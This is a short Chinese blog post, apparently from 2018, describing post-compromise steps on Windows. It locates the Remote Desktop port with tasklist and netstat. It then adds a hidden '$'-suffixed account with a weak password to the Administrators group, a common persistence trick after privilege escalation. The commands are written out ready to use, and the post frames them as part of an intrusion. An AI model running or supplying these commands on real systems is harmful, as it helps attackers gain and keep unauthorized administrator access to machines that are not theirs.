在我们后期提权的过程中,成功添加账号密码
tasklist /svc
在输出的内容中查找 svchost.exe 进程下 termservice 服务对应的 PID
netstat -ano
即可找到 PID 对应的开放端口,即远程桌面开放端口
然后就是一顿提权猛如虎
net user dyboy$ admin123456 /add net localgroup Administrators dyboy$ /add
版权声明:《 Windows查看远程桌面端口/提权 》为DYBOY原创文章,转载请注明出处!
最后编辑:2018-7-28 09:07:51